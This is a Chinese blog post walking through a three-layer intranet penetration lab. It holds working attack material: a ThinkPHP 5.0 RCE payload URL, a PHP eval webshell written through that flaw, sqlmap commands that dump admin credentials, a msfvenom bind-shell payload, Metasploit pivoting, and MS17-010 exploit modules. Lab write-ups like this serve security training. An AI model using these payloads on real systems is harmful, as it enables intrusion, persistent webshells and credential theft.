CFS三层内网靶场

前言

最近学习了内网的一些知识,想着打一下靶场来试试,选择了这个CFS的三层内网靶场,做一下记录

  • 靶场下载地址

    链接:https://pan.baidu.com/s/1zGw5VNt222nCmfouVWLupQ 
    提取码:6u5e 

具体的环境配置以及靶机IP如下图所示:

1.对target1进行渗透

首先我们使用nmap对target1进行端口扫描,看看能不能找到什么开放的端口

 

 可以看到,开放了80端口,以及8888端口,80端口是http网站得默认端口,8888端口对应的是宝塔的管理面板,那我们就访问80端口看看是什么页面

 

 是一个thinkPhP5.0的框架,参考了网上文章,v5.0版本存在RCE漏洞:https://blog.csdn.net/qq_45557476/article/details/125275641

那么我们就来构建poc,看看是不是能执行whoami的命令  poc:http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 可以看到成功的返回信息,那么现在我们就可以网其中写入php一句话代码,因为这是一个靶场所以不需要对小马做免杀,直接echo写入即可

尝试写入phpinfo()

http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20phpinfo();?%3E%22%20%3E%20info.php

 

 成功了!写入小马http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C?php%20eval($_REQUEST[123]);?%3E%27%20%3Eb.php,访问b.php发现文件存在,然后使用蚁剑连接。拿到第一个flag。

 

 2.对target2进行渗透

 现在拿到了target1主机的权限,那么现在把target1主机连接到到msf上

1)生成后门文件

 2)接受反弹

在target1上运行后门文件,可以使用chmod +x对文件进行简单的提权,使其可以运行,然后在kali上使用msf接受会话

 

 可以发现,这台主机有两张网卡,一个是22网段一个是75网段,那么我们现在需要攻击的主机就在22网段下

 但是,我们实际上是没有对22网段机器的访问权限的,我们只能通过target1作为中介,去和22网段的机器进行交互,那么这个时候我们就需要使用msf首先给target1设置路由

 这时候所有kali发往22网段的请求在经过target1的时候会被转发,那么target1就好像是我们的一个代理服务器一般,但是就算在target1上添加上了这个路由,我们仍然需要在kali上进行代理设置才可以实现效果。这时候就可以用到sock4+proxychains4代理打通内网

开通sock4代理

 

修改proxychains4配置文件

 

 节省时间只对目标机器做了扫描

可以看到80端口开放,那么浏览器设置sock4代理去访问。

 

访问成功,可以看到是一个八哥CMS

 

访问http://192.168.22.129/robots.txt发现暴露了后台地址,成功进入后台地址,那么怎么拿到账号密码吗,在首页的html中给了我们sql注入的地址

前台html代码给的sql注入点

 

 

sqlmap一把梭

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 --dbs

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D bagecms --tables 

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin --columns

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin -C username,password --dump

拿到用户名密码admin 123qwe,可以看到flag

 3.对target3进行渗透

 

 

 在内容模板写入shell

 

 

 蚁剑设置代理192.168.75.128 2222,访问target2主机,发现33网段

 

 

 因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向马

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf

将马赋执行权限上传到webshell中 同时使用代理开启一个msf

proxychains4 msfconsole

使用代理的msf开启监听

use exploit/multi/handler 使用监听模块
set payload linux/x86/meterpreter/bind_tcp 设置payload
set lport 4444 设置接收端口与msfvenoms生成端口一致
set rhost 192.168.22.129 设置目标主机(target2)

 

 

 在target2上添加添加33网段路由

run autoroute -s 192.168.33.0/24

run autoroute -p

使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

发现 192.168.33.33 主机并开放 445、3389  敏感端口

 

 msf尝试永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010 检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe 利用ms17010

use auxiliary/admin/smb/ms17_010_command 这个exp可以执行命令

 

 至此三台靶机shell拿下了

posted @ 2023-01-08 20:08  林烬  阅读(614)  评论(1编辑  收藏  举报